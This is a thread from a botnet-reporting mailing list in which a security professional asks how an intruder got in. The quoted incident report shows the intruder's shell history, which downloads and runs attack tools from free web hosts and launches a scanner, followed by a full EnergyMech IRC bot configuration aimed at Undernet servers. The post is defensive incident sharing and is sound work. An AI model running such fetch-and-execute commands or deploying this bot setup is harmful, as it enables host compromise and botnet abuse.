To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
How did they get in?
Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45
---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com - "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security
bodik wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> Hi,
>
> we've found one instance of bot from someone called Drow (tools were
> compiled but not stripped somewhere in /home/drow ... ;))). Probably a
> spanish speaking person.
>
> Undernet admins should take a look down below and check their servers.
> if there are listening here ..
>
> access was gained by very very weak password, and standard procedure
> comes, download bot, ssh cracker, spam tool ...
>
> was a kiddie, comes from 89.123.217.233, no with no cleanup and probably
> a manual job ..
>
> ---- cut history ----
>
> passwd
>
> ps x
>
> cd /tmp
>
> w
>
> ps x
>
> cd /tmp
>
> wget freewebs.com/staycu/stayku.tar
>
> tar xzvf stayku.tar
>
> cd .staycu
>
> ./linux
>
> cat /proc/cpuinfo
>
> cd /var/tmp/delles
>
> cd /var/tmp
>
> wget http://www.geocities.com/demonfire_16/delles.tar.gz
>
> tar xzvf delles.tar.gz
>
> cd delles
>
> ./a 200.62
>
> nohup ./start 59 >> /dev/null &
>
> cd /var/tmp/delles
>
> cat vuln.txt
>
> ps x
>
> cd /var/tmp/delles
>
> cat vuln.txt
>
> ps x
>
> cd /var/tmp/delles
>
> cat vuln.txt
> ...
> ...
> ---- cut history ----
>
> bodik
>
> ---- cut ----
>
> # Boqdan`S EnergyMech configuration file
> # v2.9.3 - Boqdan
>
> ##### Linking #####
> #ENTITY emech
> #LINKPASS abc123
> #LINKPORT 49152
> #LINK hismech a1b2c3 mech.host.net 49152
> #LINK hermech abcdefg 0 0
> AUTOLINK
>
> ##### Server List ####
> SERVER diemen.nl.eu.undernet.org 6660
> SERVER diemen.nl.eu.undernet.org 6667
> SERVER diemen.nl.eu.undernet.org 6669
> SERVER lelystad.nl.eu.undernet.org 6666
> SERVER lelystad.nl.eu.undernet.org 6667
> SERVER lelystad.nl.eu.undernet.org 6668
> SERVER london2.uk.eu.undernet.org 6660
> SERVER london2.uk.eu.undernet.org 6669
> SERVER london2.uk.eu.undernet.org 7000
> SERVER graz.at.eu.undernet.org 6660
> SERVER graz.at.eu.undernet.org 6670
> SERVER graz.at.eu.undernet.org 7000
> SERVER helsinki.fi.eu.undernet.org 6666
> SERVER helsinki.fi.eu.undernet.org 6669
> SERVER helsinki.fi.eu.undernet.org 7000
> SERVER montreal.qc.ca.undernet.org 6665
> SERVER montreal.qc.ca.undernet.rog 6669
> SERVER montreal.qc.ca.undernet.org 7000
> SERVER oslo2.no.eu.undernet.org 6660
> SERVER oslo2.no.eu.undernet.org 6669
> SERVER oslo2.no.eu.undernet.org 7000
>
>
>
> # SERVER 1.2.3.4 6667 ThisIsMyPassword
> # SERVER 192.168.100.1 6669 moo:eu.undernet.org:6667
>
> ##### Bot 1 Configuration #####
> NICK Boqdan
> USERFILE 1
> CMDCHAR -
> LOGIN gat
> IRCNAME tundd
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 1 #####
>
> ##### Bot 2 Configuration #####
>
> NICK Guapo
> USERFILE 1
> CMDCHAR -
> LOGIN lmess
> IRCNAME mesaju
> MODES +ix-ws
> #VIRtual
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 2 #####
>
> ##### Bot 3 Configuration #####
>
> NICK Bogdy
> USERFILE 1
> CMDCHAR -
> LOGIN Lucru
> IRCNAME LeLa
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 3 #####
> ---- cut ----
> _______________________________________________
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
begin:vcard fn:Adriel T Desautels n:Desautels;Adriel T org:Netragard, LLC. adr:;;17 Sheldon Road;Mendham ;NJ;;USA email;internet:[EMAIL PROTECTED] title:Chief Technology Officer tel;work:617-934-0269 tel;cell:617-633-3821 x-mozilla-html:FALSE url:http://www.netragard.com version:2.1 end:vcard
signature.asc
Description: OpenPGP digital signature
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
